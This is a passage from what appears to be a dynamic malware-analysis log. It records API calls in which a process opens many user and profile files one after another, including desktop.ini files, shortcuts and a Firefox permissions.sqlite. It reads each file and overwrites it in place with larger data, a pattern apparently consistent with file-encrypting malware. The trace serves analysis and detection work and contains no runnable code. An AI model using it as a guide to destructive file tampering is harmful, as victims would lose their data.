lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0182.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edb.chk", cchWideChar=7, lpMultiByteStr=0x1f7a834, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edb.chk", lpUsedDefaultChar=0x0) returned 7 [0182.380] ReadFile (in: hFile=0x204, lpBuffer=0x2885de8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2885de8*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0182.382] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.382] WriteFile (in: hFile=0x204, lpBuffer=0x2885de8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2885de8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0182.382] CloseHandle (hObject=0x204) returned 1 [0182.383] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xed [0182.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.383] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.383] ReleaseMutex (hMutex=0x168) returned 1 [0182.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0182.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Circles.htm", lpUsedDefaultChar=0x0) returned 18 [0182.384] ReadFile (in: hFile=0x204, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2fdf2bc*=0xed, lpOverlapped=0x0) returned 1 [0182.384] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.384] WriteFile (in: hFile=0x204, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x675, lpOverlapped=0x0) returned 1 [0182.385] CloseHandle (hObject=0x204) returned 1 [0182.385] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.386] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.386] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1f2 [0182.386] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.386] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.386] ReleaseMutex (hMutex=0x168) returned 1 [0182.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WMSDKNS.DTD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WMSDKNS.DTD", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMSDKNS.DTD", lpUsedDefaultChar=0x0) returned 11 [0182.387] ReadFile (in: hFile=0x204, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f2, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1f2, lpOverlapped=0x0) returned 1 [0182.388] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.388] WriteFile (in: hFile=0x204, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x77a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x77a, lpOverlapped=0x0) returned 1 [0182.388] CloseHandle (hObject=0x204) returned 1 [0182.388] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.389] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.389] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x19c [0182.389] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.390] ReleaseMutex (hMutex=0x168) returned 1 [0182.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0182.390] ReadFile (in: hFile=0x204, lpBuffer=0x25af228, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x2fdf2bc*=0x19c, lpOverlapped=0x0) returned 1 [0182.391] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.391] WriteFile (in: hFile=0x204, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x724, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x724, lpOverlapped=0x0) returned 1 [0182.391] CloseHandle (hObject=0x204) returned 1 [0182.391] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.392] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.392] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x85 [0182.392] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.392] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.392] ReleaseMutex (hMutex=0x168) returned 1 [0182.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0182.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE site on Microsoft.com.url", lpUsedDefaultChar=0x0) returned 28 [0182.392] ReadFile (in: hFile=0x204, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2fdf2bc*=0x85, lpOverlapped=0x0) returned 1 [0182.393] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.394] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x60d, lpOverlapped=0x0) returned 1 [0182.394] CloseHandle (hObject=0x204) returned 1 [0182.394] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.394] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.395] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x85 [0182.395] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.395] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.395] ReleaseMutex (hMutex=0x168) returned 1 [0182.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0182.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x1f7a834, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN.url", lpUsedDefaultChar=0x0) returned 7 [0182.395] ReadFile (in: hFile=0x204, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2fdf2bc*=0x85, lpOverlapped=0x0) returned 1 [0182.396] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.396] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x60d, lpOverlapped=0x0) returned 1 [0182.397] CloseHandle (hObject=0x204) returned 1 [0182.397] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x37e [0182.398] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.398] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.398] ReleaseMutex (hMutex=0x168) returned 1 [0182.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Downloads.lnk", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0182.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Downloads.lnk", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Downloads.lnk", lpUsedDefaultChar=0x0) returned 13 [0182.398] ReadFile (in: hFile=0x204, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x37e, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x2fdf2bc*=0x37e, lpOverlapped=0x0) returned 1 [0182.458] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.458] WriteFile (in: hFile=0x204, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x906, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x906, lpOverlapped=0x0) returned 1 [0182.459] CloseHandle (hObject=0x204) returned 1 [0182.459] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.460] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.460] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xae [0182.460] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.461] ReleaseMutex (hMutex=0x168) returned 1 [0182.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0182.461] ReadFile (in: hFile=0x204, lpBuffer=0x1f3a158, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3a158*, lpNumberOfBytesRead=0x2fdf2bc*=0xae, lpOverlapped=0x0) returned 1 [0182.462] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.462] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x636, lpOverlapped=0x0) returned 1 [0182.462] CloseHandle (hObject=0x204) returned 1 [0182.463] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.464] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.464] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x58 [0182.464] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.464] ReleaseMutex (hMutex=0x168) returned 1 [0182.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0182.465] ReadFile (in: hFile=0x204, lpBuffer=0x1fbb320, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbb320*, lpNumberOfBytesRead=0x2fdf2bc*=0x58, lpOverlapped=0x0) returned 1 [0182.466] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.466] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5e0, lpOverlapped=0x0) returned 1 [0182.466] CloseHandle (hObject=0x204) returned 1 [0182.467] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x460 [0182.468] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.468] ReleaseMutex (hMutex=0x168) returned 1 [0182.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0182.469] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2fdf2bc*=0x460, lpOverlapped=0x0) returned 1 [0182.471] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.471] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9e8, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9e8, lpOverlapped=0x0) returned 1 [0182.471] CloseHandle (hObject=0x204) returned 1 [0182.472] GetCurrentThreadId () returned 0x8ec [0182.472] GetCurrentThreadId () returned 0x8ec [0182.472] GetCurrentThreadId () returned 0x8ec [0182.472] SetEvent (hEvent=0xc4) returned 1 [0182.472] RtlExitUserThread (Status=0x0) Thread: id = 16 os_tid = 0x8fc [0061.241] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.241] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x311f690*="RacWmiDatabase.sdf") returned 0x41 [0061.241] GetLastError () returned 0x20 [0061.242] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i̑폈H̑퐔H̑") returned 0x51 [0061.262] LocalFree (hMem=0x696c00) returned 0x0 [0061.263] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0061.263] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0061.264] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0061.264] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0061.264] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf")) returned 0x2020 [0061.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10000 [0061.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.265] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.265] ReleaseMutex (hMutex=0x168) returned 1 [0061.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="permissions.sqlite", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="permissions.sqlite", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, 